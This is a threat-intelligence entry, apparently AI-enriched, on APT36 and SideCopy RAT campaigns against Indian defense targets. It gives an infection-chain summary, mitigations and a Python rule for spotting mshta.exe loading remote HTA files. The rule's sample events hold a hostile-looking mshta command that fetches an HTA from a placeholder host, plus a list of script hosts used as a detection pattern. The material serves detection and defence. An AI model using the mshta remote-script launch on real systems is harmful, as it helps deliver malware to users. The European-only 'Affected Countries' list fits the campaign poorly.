APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities
Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines. The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT, which are often
AI Analysis
Technical Summary
The threat involves coordinated cyber espionage campaigns by APT36 (Transparent Tribe) and SideCopy, targeting Indian defense and government-aligned organizations through cross-platform Remote Access Trojans (RATs) designed for Windows and Linux environments. The campaigns utilize phishing emails containing malicious Windows shortcut (LNK) files, ELF binaries, and PowerPoint Add-In files to initiate multi-stage infection chains. For Windows targets, the attack chain typically begins with a malicious LNK file that executes mshta.exe to run an HTA file hosted on compromised legitimate domains. This HTA file contains JavaScript that decrypts an embedded DLL payload, which writes a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the decoy to the user. The malware then checks for installed security products and adapts its persistence method before deploying Geta RAT. Geta RAT provides extensive capabilities including system reconnaissance, process enumeration and termination, credential harvesting, clipboard manipulation, screenshot capture, file operations, arbitrary shell command execution, and data harvesting from USB devices.
Parallel Linux campaigns deploy a Go binary that downloads a Python-based Ares RAT via shell scripts, offering similar espionage capabilities and command execution flexibility. Additionally, DeskRAT, a Golang-based RAT delivered through rogue PowerPoint Add-In files with embedded macros, is used to establish persistent remote access. These campaigns are characterized by stealth, memory-resident techniques, and evolving delivery vectors to maintain long-term access while operating below detection thresholds. The threat actors leverage defense-themed lures and regionally trusted infrastructure to increase success rates.
Although no known public exploits are reported, the campaigns represent a persistent and evolving espionage threat with a focus on sensitive Indian sectors, extending to policy, research, critical infrastructure, and defense-adjacent organizations.
Potential Impact
European organizations, especially those involved in defense, government, critical infrastructure, research, and policy sectors with ties or interests related to India or South Asia, could face indirect risks from similar espionage tactics or collateral targeting. The cross-platform nature of the RATs means both Windows and Linux systems are potential targets, increasing the attack surface. The malware’s capabilities to steal sensitive data, harvest credentials, manipulate processes, and maintain persistent access could lead to significant confidentiality breaches, operational disruption, and long-term espionage. European entities collaborating with Indian defense or government agencies might be targeted for intelligence gathering or supply chain compromise. The use of regionally trusted infrastructure and sophisticated evasion techniques complicates detection and response, potentially allowing attackers to remain undetected for extended periods. While the campaigns are currently India-focused, the evolving toolkit and delivery methods could be adapted against European targets, especially in countries with strategic defense industries or geopolitical interest in South Asia. The threat also underscores the need for vigilance against phishing and supply chain attacks that leverage legitimate infrastructure for malware delivery.
Mitigation Recommendations
European organizations should implement targeted defenses beyond generic advice:
1) Enhance phishing detection and user training focused on identifying malicious LNK files, PowerPoint Add-Ins, and unusual attachments, especially those mimicking defense or government documents.
2) Deploy advanced endpoint detection and response (EDR) solutions capable of detecting memory-resident malware and suspicious use of mshta.exe and PowerShell or script execution.
3) Monitor network traffic for connections to known or suspicious C2 servers, including those hosted on compromised legitimate domains, and employ DNS filtering to block access to malicious infrastructure.
4) Implement application whitelisting to restrict execution of unauthorized binaries, scripts, and macros, particularly on sensitive systems.
5) Conduct regular threat hunting exercises focusing on indicators of lateral movement, credential harvesting, and persistence mechanisms associated with Geta RAT, Ares RAT, and DeskRAT.
6) Harden Linux systems by restricting execution of unauthorized Go binaries and Python scripts, and monitor for unusual shell script downloads or executions.
7) Maintain up-to-date asset inventories and vulnerability management to quickly identify and remediate exposures.
8) Collaborate with national cybersecurity agencies and information sharing platforms to receive timely intelligence on emerging threats and indicators related to these campaigns.
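A detection check for the Windows delivery stage described in the technical summary (LNK launching mshta.exe against an HTA hosted on a compromised legitimate domain) and called for in recommendation 2), added here as an example; it is not code from the source article or from any vendor rule set. It keys on the behaviour rather than a domain list, because the page notes the HTAs sit on otherwise legitimate domains, and the second rule (mshta.exe as the parent of a script host) is an assumed generalization beyond the chain the page describes. The events, field names and the example-compromised.invalid host are constructed.

```python
import re

# Constructed process-creation events in a simplified Sysmon Event ID 1 shape.
# Hosts and paths are illustrative, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",           # user opened an LNK
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example-compromised.invalid/docs/brief.hta'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",           # local HTA, e.g. a vendor installer
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c dir'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",     # script host spawned by mshta
     "CommandLine": r'powershell.exe -File C:\Users\Public\stage.ps1'},
]

# Any remote scheme in the mshta command line; the host itself is not consulted.
REMOTE_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Script hosts whose parent should rarely be mshta.exe on a workstation.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    findings = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    if image == "mshta.exe" and REMOTE_RE.search(event["CommandLine"]):
        findings.append("mshta_remote_hta")
    if image in SCRIPT_HOSTS and parent == "mshta.exe":
        findings.append("mshta_spawned_script_host")
    return findings


def scan(events):
    """Return (index, labels) for every event that triggers at least one rule."""
    hits = []
    for i, event in enumerate(events):
        labels = classify(event)
        if labels:
            hits.append((i, labels))
    return hits


if __name__ == "__main__":
    for i, labels in scan(SAMPLE_EVENTS):
        print(i, labels, SAMPLE_EVENTS[i]["CommandLine"])
```

The local-HTA event is deliberately left unflagged so the rule does not fire on every HTA on the estate; tune SCRIPT_HOSTS against your own baseline before alerting on it.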
Affected Countries
United Kingdom, Germany, France, Italy, Spain, Netherlands, Poland
Technical Details
Article Source: https://thehackernews.com/2026/02/apt36-and-sidecopy-launch-cross.html (fetched 2026-02-12T07:45:45.454Z, 1154 words)
Threat ID: 698d852bc9e1ff5ad8a5218c
Added to database: 2/12/2026, 7:45:47 AM
Last enriched: 2/12/2026, 7:46:41 AM
Last updated: 2/19/2026, 6:05:15 PM